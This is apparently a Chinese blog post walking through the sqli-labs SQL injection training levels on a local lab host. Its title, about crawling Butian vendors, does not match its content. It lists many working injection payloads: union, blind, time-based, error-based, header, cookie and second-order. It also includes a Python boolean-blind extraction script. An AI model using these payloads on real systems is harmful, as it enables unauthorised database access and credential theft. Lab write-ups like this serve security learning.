<!DOCTYPE html>
<html>
  <!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  
  <title>对补天公益厂商进行爬虫 - P1g3</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
  
  <meta name="keywords" content="P1g3">
  
  
    <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=1.02">
  
  
    <link rel="alternate" href="/atom.xml " title="P1g3" type="application/atom+xml">
  

  <link rel="stylesheet" href="/css/style.css">
</head></html>
  <body>
    <div class="container">
      <header class="header">
  <div class="blog-title">
    <a href="/" class="logo">P1g3</a>
    <div class="subtitle"></div>
  </div>
  <nav class="navbar">
    <ul class="menu">
      
        <li class="menu-item">
          <a href="/" class="menu-item-link">Home</a>
        </li>
      
        <li class="menu-item">
          <a href="/archives" class="menu-item-link">Archives</a>
        </li>
      
        <li class="menu-item">
          <a href="/about" class="menu-item-link">About</a>
        </li>
      
        <li class="menu-item">
          <a href="/friends" class="menu-item-link">Friends</a>
        </li>
      
    </ul>
  </nav>
</header>
<article class="post">
  <div class="post-title">
    <h1 class="article-title">对补天公益厂商进行爬虫</h1>
  </div>
   <div class="post-meta">
    <span class="post-time">2018-11-18</span>
  </div>
  <div class="post-content">
    <h2 id="Less-1"><a href="#Less-1" class="headerlink" title="Less-1"></a>Less-1</h2><p><img src="http://static.zybuluo.com/Em1or/oxwu6xgrc3bc734v82huqx55/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-457.7kB"></p>
<p>题目描述让我们输入id这个参数。</p>
<p><img src="http://static.zybuluo.com/Em1or/s5l16gggrjpa3djdir44o6s2/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-467.5kB"></p>
<p>输入了之后会返回这个这个参数查询到的相关值。</p>
<p>推测查询语句：</p>
<p>SELECT * FROM TABLE WHERE id=’$id’，而这里的<code>$id</code>应该就是我们刚刚输入的1。</p>
<p>我们如果想执行我们的sql语句，就需要闭合这个单引号，构造payload。</p>
<p>id=-1’union select 1,2,database()–+</p>
<p>至于这里为什么需要把id设为-，是因为union查询返回的是一个查询集，如果前面的查询有结果，就会直接返回信息给我们，但是我们需要看的是后面一条信息的结果，所以前面就不能有结果。</p>
<p><img src="http://static.zybuluo.com/Em1or/4iqd7cln3ydmbji52qpzzqtt/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-471.2kB"></p>
<p>可以查出当前库为security，我们接着查所有库，就用MYSQL的information_schema。</p>
<p>构造payload：</p>
<p>id=-1’union select 1,2,SCHEMA_NAME FROM information_schema.SCHEMATA limit 0,1–+</p>
<p>limit函数用于设置返回数据的数目。</p>
<p>limit start,size </p>
<p>start：从第几条数据开始<br>size：读取几条数据</p>
<p>因为这里只能显示一条数据，所以我们只能从0,1、1,1、2,1一直读数据库。</p>
<p><img src="http://static.zybuluo.com/Em1or/qbqrgh2gaa8yi67hx51ragjt/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-477.9kB"></p>
<p>现在开始查我们所需要库的表：</p>
<p>构造payload：</p>
<p>id=-1’union select 1,2,TABLE_NAME FROM information_schema.tables where table_schema=database() limit 0,1–+</p>
<p><img src="http://static.zybuluo.com/Em1or/cicbjcpqxupigvfmmlt0iivc/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-482.7kB"></p>
<p>如果这条语句看不懂的话，我们可以看看information_schema.tables这个表的结构。</p>
<p><img src="http://static.zybuluo.com/Em1or/jni1szl71lgpbxunw6jax3e4/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-176.5kB"></p>
<p>这条语句就相当于从这个表中的TABLE_NAME列中取从0开始的一条数据，后面跟了一个判断语句，where table_schema=database() database()返回的就是当前库的库名，所以相当于取出table_schema为当前库的表的数据。</p>
<p>获得表了之后就可以开始查列了：</p>
<p>还是和上面一样，利用information_schema这个库来得出我们需要的信息。</p>
<p>构造payload：id=-1’union select 1,2,COLUMN_NAME FROM information_schema.columns where column_schema=user limit 0,1 –+</p>
<p>获取到列之后就可以开始获取数据了，这里如果我们不想麻烦想直接获取全部数据的话，可以这么做：</p>
<p>id=-1’union select 1,2,group_contact(字段1,0x2c,字段2) from table</p>
<p>这样就可以直接显示出username和password的信息而不用一个一个跑了。</p>
<p>group_contact函数将多条记录合并为单挑记录，中间的0x2c是十六进制的逗号，这样出来的结果更方便看。</p>
<p>至此Less-1已经通关</p>
<h2 id="Less-2"><a href="#Less-2" class="headerlink" title="Less-2"></a>Less-2</h2><p>这里和第一关没什么太大区别，只是第一关的id是有单引号的，第二关连单引号都没有了，所以我们可以直接注入，注释都省了。</p>
<p>推测第二关的SQL语句：select * from table where id=$id。</p>
<p>注入和第一关一样，不重写了。</p>
<h2 id="Less-3"><a href="#Less-3" class="headerlink" title="Less-3"></a>Less-3</h2><p>以后的关卡都只展示BYPASS方法，因为BYPASS之后注入的过程就和普通注入差不多了。</p>
<p>推测本关查询语句为：select * from table where id=(‘$id’)</p>
<p>所以我们只需要对$id进行闭合，然后就可以开始构造sql语句了。</p>
<p>$id=’)exp–+</p>
<p>测试：</p>
<p><img src="http://static.zybuluo.com/Em1or/cwyoavl2g6616scidrrx0fgv/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-600.7kB"></p>
<h2 id="Less-4"><a href="#Less-4" class="headerlink" title="Less-4"></a>Less-4</h2><p>查看源码：</p>
<pre><code>$id = &apos;&quot;&apos; . $id . &apos;&quot;&apos;;
$sql=&quot;SELECT * FROM users WHERE id=($id) LIMIT 0,1&quot;;
</code></pre><p>这样实际上sql语句就变成：SELECT * FROM users WHERE id =(“$id”) LIMIT 0,1了。</p>
<p>和之前一样，构造闭合：</p>
<p>$id=-1”)exp–+<br><img src="http://static.zybuluo.com/Em1or/9blcmqfklo5qrzxqfw5vn6hh/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-609kB"></p>
<h2 id="Less-5"><a href="#Less-5" class="headerlink" title="Less-5"></a>Less-5</h2><p>测试发现输入正确就会出现you are in这么个字符，既然无回显，我们就只能布尔盲注了。</p>
<p>猜测sql语句：<code>select * from table where id = &#39;$id&#39; limit 0,1</code></p>
<p>构造payload测试注入：</p>
<pre><code>$id=1&apos; and 1=1--+
$id=1&apos; and 1=2--+
</code></pre><p>发现一个有回显一个无回显，成功证明这里存在注入。</p>
<p>写个盲注脚本吧。</p>
<p><img src="http://static.zybuluo.com/Em1or/vrcjm47ca0i7z05n4qho17lk/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-101.5kB"></p>
<p>这是跑当前库的，我们写一个跑所有库的。</p>
<p><img src="http://static.zybuluo.com/Em1or/mj0wmfythmyfk12hvshr4fjt/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-136.6kB"></p>
<p>该一下payload就好了，可以看到我们这没跑全，是因为我的characters不包含下划线这些特殊字符，最全的是：characters = string.ascii_letters + string.digits + string.punctuation</p>
<p>我还是不知道到底应该怎么加快布尔盲注的注入速度…所以还是要多学习，这关已经BYPASS了。</p>
<h2 id="Less-6"><a href="#Less-6" class="headerlink" title="Less-6"></a>Less-6</h2><p>这题和上题的解题思路是一样的，只不过语句变了一些，单引号变双引号了。</p>
<p>select * from table where id=”$id”</p>
<p>我们只需要双引号闭合再把后面的双引号注释了，就可以继续开始盲注了。</p>
<p><img src="http://static.zybuluo.com/Em1or/1vfmbocm5dyblkauwo5yc95g/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-104.2kB"></p>
<p>可以看到是可以跑出来的，接下来步骤就一样了，不讲了。</p>
<h2 id="Less-7"><a href="#Less-7" class="headerlink" title="Less-7"></a>Less-7</h2><p>这道题还是一道盲注题，只不过sql语句变了。</p>
<p>select * from table where id=((‘$id’))</p>
<p>payload：</p>
<p>$id=’))exp–+</p>
<p>改一下脚本里exp的位置就可以跑了。</p>
<p><img src="http://static.zybuluo.com/Em1or/2b7366sz2ciuf6ubaehy7wvo/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-98.1kB"></p>
<h2 id="Less-8"><a href="#Less-8" class="headerlink" title="Less-8"></a>Less-8</h2><p>这道题和之前几道盲注是一样的，只不过改了一下sql语句：</p>
<p>select * from table where id=’$id’。</p>
<p>构造payload：</p>
<p>$id=’exp–+</p>
<p>改一下脚本就可以跑了。</p>
<p><img src="http://static.zybuluo.com/Em1or/7zc61w66dsquxmxuh5unrf2g/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-97.6kB"></p>
<h2 id="Less-9"><a href="#Less-9" class="headerlink" title="Less-9"></a>Less-9</h2><p>这道题无论输入什么，最后返回的都是You are in………..。</p>
<p>所以如果我们想要测试是否有注入，就只能用延时来测。</p>
<pre><code>http://sqllab/Less-9/?id=1%27%20and%20if(1=1,sleep(2),NULL)--+
</code></pre><p>这样实际上的语句就是：</p>
<p>select * from table where id=’1’and if(1=1,sleep(3),NULL)–+’，最后访问网页的时候确实延了三秒时间，所以确定这里有注入。</p>
<p>接下来就是写延时注入的脚本了。</p>
<p><img src="http://static.zybuluo.com/Em1or/v5vddzct232wyjunt1a9qjlt/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-102.1kB"></p>
<p>改了一下，虽然能跑出来，但是速度好慢，希望以后能慢慢学习到更好的姿势加速延时注入的速度…</p>
<h2 id="Less-10"><a href="#Less-10" class="headerlink" title="Less-10"></a>Less-10</h2><p>这题和上题一样，只不过改了一下sql语句。</p>
<p>select * from table where id=”$id”，不过还是一样的输什么都显示一个样，所以还是只能延时…</p>
<p>改一下脚本跑起来：</p>
<p><img src="http://static.zybuluo.com/Em1or/q8gbce4j1ldt4c9pgm510fm0/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-102.5kB"></p>
<h2 id="Less-11"><a href="#Less-11" class="headerlink" title="Less-11"></a>Less-11</h2><p><img src="http://static.zybuluo.com/Em1or/c4gp6ayyf8yvk7mhjy689nid/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-222.1kB"></p>
<p>在用户名处输个单引号，报错，从报错信息推一下sql语句：</p>
<pre><code>select * from table where username=&apos;$username&apos; and password=&apos;$password&apos;
</code></pre><p>这里可以直接使用万年密码，构造payload。</p>
<p>$username：1’ or 1=1#</p>
<p>这里的#是MYSQL的注释符。</p>
<p>构造一下就可以登录了。</p>
<p><img src="http://static.zybuluo.com/Em1or/6zvcw5kl8n5z4nee459qcgdd/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-588.4kB"></p>
<p>如果我们想获取其它信息，’union select 1,version()#。</p>
<p><img src="http://static.zybuluo.com/Em1or/kbz7p5n1ie6hu9e5yq4pi6ju/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-587.6kB"></p>
<h2 id="Less-12"><a href="#Less-12" class="headerlink" title="Less-12"></a>Less-12</h2><p>在用户名处输入双引号，报错，查看其报错信息，推sql语句：</p>
<p><img src="http://static.zybuluo.com/Em1or/o63gpkq56awm0jkq33bq6oey/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-570.3kB"></p>
<pre><code>select * from table where username=(&quot;$username&quot;) and password=(&quot;$password&quot;)
</code></pre><p>构造payload：</p>
<p>$username=” or 1=1#</p>
<p><img src="http://static.zybuluo.com/Em1or/ukc3ttbvfd2yazol22g1jr0d/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-588kB"></p>
<p>成功登录，获取其它信息：</p>
<p>$username=”)union select 1,version()#</p>
<p><img src="http://static.zybuluo.com/Em1or/gt3xdnt4p5pbfaln1rmjgygs/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-587.8kB"></p>
<p>$username=”)union select 1,SCHEMA_NAME from information_schema.schemata#</p>
<p><img src="http://static.zybuluo.com/Em1or/ji6x5n6h7za38a2xhcnkrie8/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-588.3kB"></p>
<h2 id="Less-13"><a href="#Less-13" class="headerlink" title="Less-13"></a>Less-13</h2><p>在用户名处输入单引号，查看报错信息，推一下sql语句：</p>
<p><img src="http://static.zybuluo.com/Em1or/kus44ltup7w8elkzmcj68lwr/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-570.5kB"></p>
<pre><code>select * from table where username=(&apos;$username&apos;) and password=(&apos;$password&apos;)
</code></pre><p>构造一下语句：</p>
<p>$username=’)or 1=1#</p>
<p><img src="http://static.zybuluo.com/Em1or/3tteurxjpru3cgdhwrjd17f0/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-586.2kB"></p>
<p>可以发现登录成功，那么继续之前的测试，发现只要语句成立，都只返回LOGIN SUCCFULLY，所以这个时候只能用布尔盲注了。</p>
<p>把之前GET的脚本改一下，改成POST的就好了…</p>
<p><img src="http://static.zybuluo.com/Em1or/6rei0d0b9bx4sxt0r29gevav/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-100.3kB"></p>
<p>脚本：</p>
<pre><code>import requests
import string
import time

characters = string.ascii_letters + string.digits + string.punctuation
data = &apos;&apos;


for i in range(1,24):
    for character in characters:
        character = data+character
        data1 = {&quot;uname&quot;: &quot;&apos;)or left((select schema_name from information_schema.schemata limit 0,1),&quot; + str( i) + &quot;)=&quot; + &quot;&apos;&quot; + character + &quot;&apos;&quot;+&quot;#&quot; ,&quot;passwd&quot;: &quot;&quot;}
        url = &quot;http://sqllab/Less-13/&quot;
        html = requests.post(url,data=data1).text
        if &quot;/images/flag.jpg&quot; in html:
            data=character
            print(&apos;[-]：&apos;+data)
            break
</code></pre><h2 id="Less-14"><a href="#Less-14" class="headerlink" title="Less-14"></a>Less-14</h2><p>输入双引号查看报错信息：</p>
<p><img src="http://static.zybuluo.com/Em1or/ob49zfca7wo1qp253vl9bneu/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-568.2kB"></p>
<p>推一下sql语句：<code>select * from table where username=(&#39;$username&#39;) and password=(&#39;$password&#39;)</code></p>
<p>构造payload：</p>
<p>$username=”exp#</p>
<p>$username=”or 1=1# 成功登录</p>
<p><img src="http://static.zybuluo.com/Em1or/5nyot8zcl0iaae3lqfi9h4ts/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-583kB"></p>
<p>和之前的差不多的，改一下语句就能继续跑了。</p>
<p><img src="http://static.zybuluo.com/Em1or/man22cfdrvjkze7leiapmj98/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-101.4kB"></p>
<h2 id="Less-15"><a href="#Less-15" class="headerlink" title="Less-15"></a>Less-15</h2><p>输单引号报错，这道题和之前是一样的。</p>
<p>sql语句：<code>select * from table where username=&#39;$username&#39; and password=&#39;$password&#39;</code></p>
<p>构造payload：</p>
<p>$username=’or 1=1# 成功进入。</p>
<p>因为成功和不成功是有标志区分的，所以还是可以用布尔。</p>
<p>用之前的脚本跑：</p>
<p><img src="http://static.zybuluo.com/Em1or/a6ngowlmpj8yaahipwknb1yl/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-99.3kB"></p>
<pre><code>很奇怪，他的题目和上题完全一样，我看不出区别，我在源码中看是username=&apos;$username&apos;，但是一到查询语句中就变成username=(&apos;$username&apos;)了。
</code></pre><h2 id="Less-16"><a href="#Less-16" class="headerlink" title="Less-16"></a>Less-16</h2><p>根据题目信息，猜一下sql语句：</p>
<pre><code>select * from table where username=&apos;($username)&apos; and password=&apos;($password)&apos;
</code></pre><p>构造payload：</p>
<p>$username=”or 1=1)# 成功进入</p>
<p>所以我们的EXP位置就在or 1=1这个位置。</p>
<p>改一下脚本就可以跑了。</p>
<p><img src="http://static.zybuluo.com/Em1or/e6qp6306w92i0xv1ixvt0zpa/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-102.2kB"></p>
<h2 id="Less-17"><a href="#Less-17" class="headerlink" title="Less-17"></a>Less-17</h2><p><img src="http://static.zybuluo.com/Em1or/hcnooxtobqtyvss21qc28vzv/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-719.8kB"></p>
<p>用户名被转义了，只能在密码处下手。</p>
<p>因为是更新密码的，猜测其sql语句：</p>
<pre><code>update table set password=&apos;$password&apos; where username=&apos;$username&apos;
</code></pre><p>这里我们构造payload：</p>
<p>$password：’and updatexml(1,concat(0x7e,(select version()),0x7e),1)#</p>
<p>这里我们利用了updatexml()函数进行报错注入。</p>
<p>语法：UPDATEXML (XML_document, XPath_string, new_value); </p>
<p>XML_document：XML文档对象名称，string类型。<br>XPath_string：Xpath格式字符串<br>new_value：String格式，替换查找到的符合条件的数据。</p>
<p>作用：改变文档中符合条件的节点的值</p>
<p>我们现在来看看语句：updatexml(1,concat(0x7e,(select version()),0x7e),1)</p>
<p>concat()函数用于返回结果连接参数产生的字符串，如果一个为NULL，那么返回NULL。</p>
<p>因为updatexml的第二个参数，也就是Xpath_string并不是Xpath类型的字符串，所以会报错。</p>
<p><img src="http://static.zybuluo.com/Em1or/amp561opqn7yf3qm2gizvqxj/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-723.6kB"></p>
<p>可以看到直接报出了版本，接下来我们依次爆当前库和当前用户。</p>
<pre><code>&apos;and updatexml(1,concat(0x7e,(select version()),(select database()),(select user()),0x7e),1)#
</code></pre><p><img src="http://static.zybuluo.com/Em1or/m2nrtcn2uiwskwxqs1q9g1xn/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-725kB"></p>
<p>爆一下其他库：</p>
<pre><code>&apos;and updatexml(1,concat(0x7e,(select SCHEMA_NAME from information_schema.schemata limit 0,1),0x7e),1)#
</code></pre><p><img src="http://static.zybuluo.com/Em1or/1sjaq04v16040lvjjh06s8bo/QQ%E6%88%AA%E5%9B%BE20181111114426.png" alt="QQ截图20181111114426.png-724.1kB"></p>
<p>接下来就是正常注入的步骤了，不演示了。</p>
<h2 id="Less-18"><a href="#Less-18" class="headerlink" title="Less-18"></a>Less-18</h2><p>这题提示了是header injection，经过测试后，登录成功之后会返回user-agent，这里的user-agent是我们可控的。</p>
<p><img src="http://static.zybuluo.com/Em1or/zcrzb8gbv6oax24wqr2b5ro2/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-268.2kB"></p>
<p>推测应该是使用了update语句：</p>
<p>update table set (username,ip,user-agent) value (‘value1’,’value2’,’value3’)</p>
<p>IP的话我们可控但是太麻烦，这里直接在user-agent处注入即可。</p>
<p>构造payload：</p>
<p>user-agent=’and updatexml(1,concat(0x7e,version(),0x7e),1)and ‘1=1</p>
<p><img src="http://static.zybuluo.com/Em1or/ams70nkza4wjzp8k297y6swt/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-274.8kB"></p>
<p>可以看到已经爆出了数据库版本，接下来就是正常注入了，不继续写了。</p>
<h2 id="Less-19"><a href="#Less-19" class="headerlink" title="Less-19"></a>Less-19</h2><p>这题和上题是一样的，只不过注入的地方从user-agent变成了refer。</p>
<p><img src="http://static.zybuluo.com/Em1or/wb8tgqu1uzokk5opk4izqkqm/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-121.3kB"></p>
<p>构造payload：refer=’and updatexml(1,concat(0x7e,version(),0x7e),1)and ‘1=1</p>
<p><img src="http://static.zybuluo.com/Em1or/xie5zc69b5giomvxkw87nsxi/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-259.1kB"></p>
<p>成功注入出数据库地址。</p>
<h2 id="Less-20"><a href="#Less-20" class="headerlink" title="Less-20"></a>Less-20</h2><p>登录之后是这么个页面：</p>
<p><img src="http://static.zybuluo.com/Em1or/bk0ey1gutwwosav6z8bxyk75/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-667.4kB"></p>
<p>测试一下cookie处有无注入：</p>
<p><img src="http://static.zybuluo.com/Em1or/euyvg9k134ckp7xmj7k7b294/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-214.1kB"></p>
<p>可以发现是返回成功的，所以确认cookie处存在注入。</p>
<p><img src="http://static.zybuluo.com/Em1or/2ncxjvrps7o5mheh3mu67pb4/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-219.7kB"></p>
<p>接下来按正常注入的步骤走就好了。</p>
<h2 id="Less-21"><a href="#Less-21" class="headerlink" title="Less-21"></a>Less-21</h2><p>登录之后发现：</p>
<p><img src="http://static.zybuluo.com/Em1or/65zaoy2po1kkyi6hke6vy019/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-707.8kB"></p>
<p>cookie是经过base64加密的，推测使用了base64加密函数，然后发现cookie里直接就是加密了的…</p>
<p>看了一下源码才知道，cookie在入库的时候会被解密，现在我们构造一个加密了的sql语句：</p>
<p><img src="http://static.zybuluo.com/Em1or/d8j368ur8c4s030ni0fq4he1/cookie.png" alt="cookie.png-588.4kB"></p>
<p>成功登录。</p>
<p><img src="http://static.zybuluo.com/Em1or/jwcq9jjqy9yczebqmn2ycvlj/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-137.1kB"></p>
<p>现在构造一下注入的payload：</p>
<p>‘)union select 1,2,version()#：Jyl1bmlvbiBzZWxlY3QgMSwyLHZlcnNpb24oKSM=</p>
<p><img src="http://static.zybuluo.com/Em1or/u73lxqqq5zwpz13pwn3pjo9a/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-144.4kB"></p>
<p>接下来就是正常注入的流程，不演示了。</p>
<h2 id="Less-22"><a href="#Less-22" class="headerlink" title="Less-22"></a>Less-22</h2><p>这道题和上一题差不多，只不过是先对cookie进行base64解密，然后再其两旁拼接双引号，然后直接代入查询，我们只需要闭合双引号就好。</p>
<p>“union select 1,2,version()#：InVuaW9uIHNlbGVjdCAxLDIsdmVyc2lvbigpIw==</p>
<p><img src="http://static.zybuluo.com/Em1or/c9eiuw389lr2wtxo7le4m91c/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-144.4kB"></p>
<p>接下来就是正常注入流程了。</p>
<h2 id="Less-23"><a href="#Less-23" class="headerlink" title="Less-23"></a>Less-23</h2><p><img src="http://static.zybuluo.com/Em1or/2ir1aol4kqxyrui23q5ox7ww/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-597.7kB"></p>
<p>随便输一些ID=1，根据返回结果推一下查询语句：</p>
<p>select username,password form table where id=’$id’。</p>
<p>依照这个思路输个单引号试试：</p>
<p><img src="http://static.zybuluo.com/Em1or/4u9idcljgt6w7zewodjnn5w3/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-618.3kB"></p>
<p>确实是报错了，但是–+和#号都注释不了。</p>
<p>猜测是正则过滤了注释符，没关系，我们可以不用注释来进行注入，构造payload。</p>
<p>payload：-1’union select 1,2,version() ‘</p>
<p>这样最终的查询语句就为：</p>
<pre><code>select username,password form table where id=&apos;-1&apos;union select 1,2,version() &apos;&apos;
</code></pre><p>我们先用单引号闭合了前面的单引号，再用单引号闭合后面的单引号，中间执行我们的联合查询语句。</p>
<p>我们来跑跑其它库：</p>
<p><img src="http://static.zybuluo.com/Em1or/ptfmyacrxme28kqdbd6xff44/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-606.6kB"></p>
<p>接下来就是正常注入流程，不演示了。</p>
<h2 id="Less-24"><a href="#Less-24" class="headerlink" title="Less-24"></a>Less-24</h2><p>先看了一下业务逻辑，主要有两个功能：</p>
<p>1.注册账户<br>2.登录账户<br>3.更换密码</p>
<p>在注册账户的地方会把用户名给显示出来，所以推测username会不会有注入。</p>
<p>推测一下sql语句：</p>
<pre><code>insert into table (username,password) values(&apos;$username&apos;,&apos;$password&apos;)
</code></pre><p>如果这里有注入，我们可以试着用updatexml来尝试报错注入,但是测试之后发现找不到用户名…</p>
<p>现在注册一个普通用户，来到修改密码的地方。</p>
<p>猜测其sql语句：</p>
<pre><code>update table set password=$password where nowpassword=&apos;xx&apos;;
</code></pre><p>现在的目标很明确，我们可以达到修改任意用户的目的。</p>
<p>首先注册一个名为admin’#的账户，他在insert的时候会转义为admin\’#，但是问题不大，mysql也能理解转义，所以并不会把\给存进去，下面我们来看个例子。</p>
<p><img src="http://static.zybuluo.com/Em1or/b9l4p6a2g33ayjjtgp3fz3wp/%E5%9B%BE%E7%89%87.png" alt="图片.png-82.5kB"></p>
<p>可以看到存的还是1’。</p>
<p>所以这个时候实际上还是添加了一个名为admin’#的用户。</p>
<p>当我们用这个用户登录之后，来到修改密码的地方：</p>
<p>提交修改密码的请求。</p>
<p><img src="http://static.zybuluo.com/Em1or/vp7n4vjekv1e8yl0yocrx5bg/QQ%E6%88%AA%E5%9B%BE20181112212536.png" alt="QQ截图20181112212536.png-374.8kB"></p>
<p>这个时候实际的sql语句：</p>
<pre><code>UPDATE users SET PASSWORD=&apos;1234567&apos; where username=&apos;admin&apos;#&apos; and password=&apos;123456&apos;
</code></pre><p>因为’闭合了前面的单引号，#注释掉了后面的语句，所以这条语句执行成功，并且成功的把admin的密码修改成1234567。</p>
<p>这应该也算是一次二次注入吧，在存进去的时候不造成漏洞，在取出来的时候就会造成漏洞。</p>
<p>那么如果我们注册一个用户名为：<code>admin&#39; and updatexml(1,concat(0x7e,version(),0x7e),1)#</code>的用户呢</p>
<p>好吧，username有长度限制，不能注册这个账号，所以这个地方的漏洞目前仅限于改密码了吧…</p>
<h2 id="Less-25"><a href="#Less-25" class="headerlink" title="Less-25"></a>Less-25</h2><p>打开网页，标题上有Trick，所有的and和or语句都不能用。</p>
<p>没关系啊，我们可以不用and和or就进行注入。</p>
<p>最终构造payload：</p>
<pre><code>-1&apos;union select 1,2,updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1)--+
</code></pre><p>因为正则匹配了or，所以我们可以用双写来进行绕过，要不然就没法正常使用information_schemat.schemata这个表。</p>
<p><img src="http://static.zybuluo.com/Em1or/owks0h85bm87whf4judkfesh/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-916.9kB"></p>
<h2 id="Less-26"><a href="#Less-26" class="headerlink" title="Less-26"></a>Less-26</h2><p>这关说是过滤了空格，我测试了一下，发现在win10+PHP5.5.38+apache环境下，所有的空格替换符都不能用。</p>
<p>使用wp中的也不行，所以暂时无解。</p>
<h2 id="Less-27"><a href="#Less-27" class="headerlink" title="Less-27"></a>Less-27</h2><p>这关还是过滤了空格，依旧无法做…</p>
<h2 id="Less-28"><a href="#Less-28" class="headerlink" title="Less-28"></a>Less-28</h2><p>这题有问题，我用法师的工具抓了一下确实是可以注出来的。</p>
<p><img src="http://static.zybuluo.com/Em1or/p4hqcj45hemyt9ehiq71213x/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-96.8kB"></p>
<p>但是题目上就没有回显。</p>
<p><img src="http://static.zybuluo.com/Em1or/fcxma9u72jbt8yil7gsoickf/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-1005.7kB"></p>
<p><img src="http://static.zybuluo.com/Em1or/fxp8ierczs0fy7st6rtw5y2z/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-117kB"></p>
<p>用了官方给的payload也不行，可能是本地环境问题把 - -</p>
<p>这题暂时无解。</p>
<h2 id="Less-29"><a href="#Less-29" class="headerlink" title="Less-29"></a>Less-29</h2><p>说是有WAF,我随手测了一下最常用的payload也没见拦…</p>
<p><img src="http://static.zybuluo.com/Em1or/g7pies276ahlkqivyp6j4a89/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-1011.4kB"></p>
<p>最终构造出查密码的payload：</p>
<pre><code>-1&apos;union select 1,2,concat(0x7e,(select username from users limit 0,1),(select password from users limit 0,1),0x7e)--+
</code></pre><p><img src="http://static.zybuluo.com/Em1or/1dmp3vndilut1jayofptq0m1/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-1002kB"></p>
<h2 id="Less-30"><a href="#Less-30" class="headerlink" title="Less-30"></a>Less-30</h2><p>这题我也没看到waf到底在哪，全都给我放了，payload：</p>
<pre><code>-1&quot; union select 1,2,version()--+
</code></pre><p><img src="http://static.zybuluo.com/Em1or/5jvxgakgo4gvaus6vsi9bvko/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-917.2kB"></p>
<p>在”和–+中插入exp就好。</p>
<h2 id="Less-31"><a href="#Less-31" class="headerlink" title="Less-31"></a>Less-31</h2><p>这道题和前两道一样，改了一下sql语句而已。</p>
<pre><code>id=-1%22)union%20select%201,2,version()--+  即可BYPASS
